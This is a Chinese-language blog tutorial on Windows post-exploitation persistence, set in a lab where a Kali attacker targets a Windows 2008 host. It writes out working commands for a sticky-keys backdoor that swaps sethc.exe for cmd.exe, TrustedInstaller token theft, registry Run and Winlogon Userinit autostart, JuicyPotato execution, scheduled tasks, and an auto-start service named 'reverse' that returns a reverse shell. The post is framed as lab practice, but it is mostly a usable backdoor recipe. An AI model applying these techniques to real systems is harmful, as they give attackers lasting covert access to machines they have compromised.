Windows 後門權限維持
Windows 後門權限維持
作者 : Noth
前言 :
和 Linux 主機滲透思路差不多,當成功提權後必須想辦法來維持權限,後面有助於來進行橫向滲透 xD。
內文 :
1. Windows shift 後門
方法一 :
實作環境 :
攻擊者 : 172.168.1.29 , kali
受害者 : 172.168.1.30 , windows 2008
已經提權反彈 meterpreter :
System32 目錄中,Shift 程序名稱為 "sethc.exe",將 cmd.exe 伪裝成 sethc.exe
cd C:\Windows\System32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
RDP 進去對方主機,連續按 shift 5 次 :
system 權限無法修改 sethc.exe 情況下(主機有做防護) :
只有 TrustedInstaller 權限才可以,需要獲取 TrustedInstaller 權限(竊取令牌)
起動 TrustedInstaller 服務 :
sc.exe start TrustedInstaller
尋找正在運行的服務 :
tasklist /svc
竊取令牌 getuid :
steal_token 700
接下來的步驟差不多就不演示了,還有 msf 中 sticky_keys 模塊 shift 後門,都是相同的東西,有興趣的小夥伴自己網路上查一下相關用法就好 xD
2. 注冊表自啟動 :
通過修改注冊表來讓程序自啟動
實作環境 :
攻擊者 : 172.168.1.29 , kali
受害者 : 172.168.1.30 , windows 2008
方法一 :
以下指令存為 1.bat 檔,上傳到 C:\Windows\Temp 中 :
提權後執行 1.bat : C:\Windows\Temp\JuicyPotato-qing.exe -p "C:\Windows\Temp\1.bat"
本地端監聽 :
使用者重開機時 , 成功 reverse_shell :
方法二 :修改 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 的鍵值 Userinit
提權後執行 1.bat :
C:\Windows\Temp\JuicyPotato-qing.exe -p "C:\Windows\Temp\1.bat"
本地端監聽 :
方法二 :
修改 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 的鍵值 Userinit
本地端進行監聽 :
使用者重開機時,發現登入自啟動 shell.exe :
3. 計畫任務後門
方式一(設定排程) :
命令:
會在每分鐘執行一次 noth.exe,在 win7 及以下的系統使用 at 命令代替 schtasks
RDP 進去對方主機 :
開啟 cmd,輸入指令:
本地端監聽 :
成功 reverse_shell :
方式二(創建服務) :
命令 :
sc create "reverse" binpath= "C:\Windows\Temp\123.exe" start= auto
net start "reverse"
RDP 進去對方主機 :
開啟 cmd,輸入指令:
成功 reverse_shell :
留言
張貼留言